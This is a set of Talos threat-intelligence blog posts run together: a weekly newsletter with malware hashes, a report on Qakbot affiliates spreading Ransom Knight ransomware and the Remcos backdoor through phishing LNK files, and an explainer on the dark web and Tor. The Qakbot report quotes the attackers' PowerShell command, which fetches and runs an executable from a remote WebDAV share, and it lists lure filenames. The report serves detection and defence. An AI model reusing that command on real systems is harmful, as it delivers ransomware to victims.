Given that Qakbot’s operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity, so it’s important to monitor the Talos blog and other security research for any additional activity. Talos has new ClamAV signatures that can detect the malware associated with this current campaign, and there is a list of IOCs at the end of our blog post everyone should be adding to their blocklists or other detection.

**Top security headlines of the week**

**The company that manages the MOVEit file transfer software disclosed several vulnerabilities in one of its other products.** Progress Software, the makers of MOVEit, which was the subject of a large data breach responsible for dozens of follow-on attacks, urged users to patch WS\_FTP Server immediately. CVE-2023-40044 is a deserialization vulnerability in the Ad Hoc Transfer module in WS\_FTP Server that an attacker could exploit without authentication to execute remote code. In all, the company disclosed eight vulnerabilities last week and released hotfixes for all versions of the software. According to the company’s website, WS\_FTP Server offers “the unique business-grade features required to assure reliable and secure transfer of critical data.” The site lists several major customers who use the affected software, including the NFL’s Denver Broncos and clothing retailer H&M. (The Record by Recorded Future, Decipher)

**Google and Yahoo are implementing new rules around bulk email sending designed to reduce the amount of spam users receive and encourage more users to report spam.** Starting in early 2024, anyone sending more than 5,000 messages a day, will need to authenticate all messages using current authentication protocols like SPF or DKIM. All these emails must also offer a one-click unsubscribe option for recipients (so hopefully no more confusing “Are you sure you want to go?!” messages on email preference pages). In its announcement, Google says its current AI-based spam filters block 99.9 percent of spam emails. However, it’s become increasingly difficult as attackers have developed new methods of bypassing traditional blocking methods or create more convincing spam emails. (The Verge, ZDNet)

**The U.S. Department of Homeland Security is investigating if any floorplans for U.S. government buildings or other physical security information were affected by a data breach at a large government contractor.** Johnson Controls International, which manufacturers security systems and other hardware important to physical offices, disclosed this week that they are actively investigating a cyber attack "to assess what information was impacted" and is "executing our incident management and protection plan." An internal DHS memo that CNN obtained stated that “Until further notice, we should assume that \[the contractor\] stores DHS floor plans and security information tied to contracts on their servers.” At the time of the memo, DHS was concerned about the possibility about a government shutdown in the U.S. that could delay research, however, Congress avoided a shutdown over the weekend by passing a temporary spending bill. (CNN, Axios)

**Can’t get enough Talos?**

*   The Need to Know: What is the dark web?
*   Threat Roundup for Sept. 22 - 29
*   Talos Takes Ep. #156: Inside a Talos Incident Response emergency event
*   Cisco Cybersecurity Awareness Month homepage

**Upcoming events where you can find Talos**

**Bsides PDX** **(Oct. 6 - 7)**

Portland State University, Oregon, U.S.

**Cisco Cybersecurity Day** **(Oct. 11)**

Nuremberg Exhibition Center, Germany

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> _Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

**misecCON** **(Nov. 17)**

Lansing, Michigan

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa  
**MD5:** 9403425a34e0c78a919681a09e5c16da  
**Typical Filename:** vincpsarzh.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa  
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27  
**Typical Filename:** профиль 10 класс.exe  
**Claimed Product:** N/A  
**Detection Name:** Application\_Blocker

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

Is it bad to have a major security incident on your résumé? (Seriously I don’t know)

The threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails.

Thursday, October 5, 2023 07:10

*   The threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails.
*   Notably, this activity appeared to begin before the FBI seized Qakbot infrastructure in late August and has been ongoing since, indicating the law enforcement operation may not have impacted Qakbot operators’ spam delivery infrastructure but rather only their command and control (C2) servers.
*   Talos attributed this new campaign to Qakbot affiliates as the metadata found in LNK files used in this campaign matches the metadata from machines used in previous Qakbot campaigns “AA” and ”BB.”
*   Though we have not seen the threat actors distributing Qakbot itself post-infrastructure takedown, we assess the malware will  continue to pose a significant threat moving forward. We see this as likely as the developers were not arrested and are still operational, opening the possibility that they may choose to rebuild the Qakbot infrastructure.

In a late August 2023 operation involving the FBI and many international partners, law enforcement agencies seized the infrastructure and cryptocurrency assets used by the Qakbot malware, dealing considerable damage to the group’s operations. Many people in the security industry wondered whether this would mean that the Qakbot affiliates were gone forever or just temporarily out of work while rebuilding their infrastructure.

Talos assesses with moderate confidence that the threat actors behind Qakbot are still active and have been conducting a new campaign that started just before the takedown, distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor. We tracked this new activity by connecting the metadata in the LNK files used in the new campaign to the machines used in previous Qakbot campaigns.

In January 2023, we wrote a blog post on using metadata from LNK files to identify and track threat actors. We specifically detailed how one machine used in the “AA” campaign with a drive serial number of “0x2848e8a8” was later used in a campaign for the new botnet named **“**BB**”.** After our blog’s publication, primary Qakbot actors responsible for the  **“**AA”, “BB**”,** and **“**Obama**”** campaigns started to wipe out the metadata in their LNK files to make detection and tracking harder.

Talos identified new LNK files in August 2023 that were created on the same machine referenced above, but observed that the payload of the files pointed to a network share in the command line that served a variant of Ransom Knight ransomware. Further analysis of the files revealed they point to Powershell.exe and pass the following arguments to download the next stage:

_**\-c "explorer '\\\\89\[.\]23\[.\]96\[.\]203@80\\333\\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\\\89\[.\]23\[.\]96\[.\]203@80\\333\\information.exe**_

The command above opens Explorer.exe and attempts to access a remote network share on IP 89\[.\]23\[.\]96\[.\]203 using WebDAV on port 80. This method could be an attempt to bypass command line detection for downloading of a remote executable via PowerShell (T1105 Ingress Tool Transfer).

The filenames of these LNK files, with themes of urgent financial matters, suggest they are being distributed in phishing emails, which is consistent with previous Qakbot campaigns:

*   ATTENTION-Invoice-29-August.docx.lnk
*   bank transfer request.lnk
*   Booking info.pdf.lnk
*   Fattura NON pagata Agosto 2023.docx.lnk
*   FRAUD bank transfer report.pdf.lnk
*   invoice OTP bank.pdf.lnk
*   MANDATORY-Invoice-28-August.docx.lnk
*   NOT-paid-Invoice-26-August.pdf.lnk
*   Nuove coordinate bancarie e IBAN 2023.docx.lnk
*   Nuove coordinate bancarie e IBAN 2023.img.lnk
*   Pay-Invoices-29-August.pdf.lnk
*   URGENT-Invoice-27-August.docx.lnk

Some of the filenames are written in Italian, which suggests the threat actors may be targeting users in that region. The LNK files are being distributed inside Zip archives that also contain an XLL file. XLL is an extension used for Excel add-ins, and comes with an icon similar to other Excel file formats:

_Zip content for one of the phishing attachments._

According to our analysis, these XLL files are the Remcos backdoor which is executed along with Ransom Knight to give the threat actors access to the machine after the infection:

_VirusTotal information for XLL_ _file distributed along Ransom Knight LNK downloader._

The LNK file, on the other hand, downloads an executable file from remote IP 89\[.\]23\[.\]96\[.\]203 shown in the command line above via WebDAV, which is the actual Ransom Knight payload. This ransomware family is an updated version of the Cyclops ransomware-as-a-service, rewritten from scratch. The threat actor behind the Cyclops service announced the new variant in May 2023:

_Dark web forum post announcing Ransom Knight ransomware._

We do not believe the Qakbot threat actors are behind the ransomware-as-a-service offer, but are simply customers of the service. As this new operation has been ongoing since the beginning of August 2023 and has not stopped after the takedown, we believe the FBI operation didn’t affect Qakbot’s phishing email delivery infrastructure but only its command and control servers. Though we have not seen the threat actors distributing Qakbot post-infrastructure takedown, we assess the malware will likely continue to pose a significant threat moving forward. Given the operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

ClamAV detections are available for this threat:  
Lnk.Downloader.Qakbot  
Win.Ransomware.Knight  
Win.Backdoor.Remcos

**IOCs**

Indicators of Compromise associated with this threat can be found here

Qakbot-affiliated actors distribute Ransom Night malware despite infrastructure takedown

What is the dark web, and how is it different from the deep web?

Wednesday, October 4, 2023 08:10

Most users interact with the internet through the web, and many of the threat actors we write about operate on the “dark web.” Broadly speaking, the dark web is a small portion of the “deep web,” where the deep web represents most of the Web.

We know, it’s confusing — let’s walk through an example.

The surface web is what you get to see when using your favorite search engine. You can search for banks, and you will find (most likely) the website of your local bank. The results will include publicly accessible information about services they offer, their address or hours of operation.

The iceberg of the deep web

Then, there is a part of this web page you are only able to see after you log in. Your name, address, transactions and account balance. This is an example of the deep web. That is, information with restricted access (for good reason).

If a breach occurs, and this information is sold by an adversary, it will show up on the dark web. The dark web is intentionally hidden and just accessible by specific anonymizing software like Tor (The Onion Router), I2P (Invisible Internet Project), Freenet or ZeroNet. It is important to note that these technologies were/are developed for good, but criminals abuse them.

From torproject.org:

> _“Our mission: To advance human rights and freedoms by creating and deploying free and open-source anonymity and privacy technologies, supporting their unrestricted availability and use, and furthering their scientific and popular understanding.”_

The easiest or most common way for a user to access the Tor Network is using the Tor Browser, an application based on Mozilla Firefox, but configured to route all traffic through the Tor Network, thereby enhancing users’ privacy and anonymity.

Tor works by sending traffic through three random relays in the Tor network. The last relay (exit relay) then sends the traffic out onto the public internet.

Firefox exposing a user’s real IP address.

Tor browser through the Tor network.

Tor also offers host services. Those webpages are then accessible by a .onion TLD, just inside the Tor network.

.onion not available.

onion available within Tor network.

An example service is shown above. Torch is a search engine in and for the Tor network. Other examples are the BBC or New York Times, which make their pages available on Tor to thwart censorship.

The anonymity for consumers and publishers is interesting for adversaries, as it provides an additional layer of obfuscation which makes it harder for law enforcement agencies to track down transactions to a physical location. That’s why there are marketplaces and forums hosted for content such as malware, stolen credentials and alike, which are monitored by our teams.

While Tor provides a high level of anonymity and privacy, there are certain aspects of online activity that Tor does not fully protect against.

Individuals requiring an even higher-level privacy and security, or the need to pass non-HTTP traffic through the Tor network should look at Tails, The Amnesic Incognito Live System and its supporting documentation.

If you’d like to continue to learn more about the basics of the topics we cover on the Talos blog, read the rest of our entries in The Need to Know series.

What is the dark web?

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 22 and Sept. 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key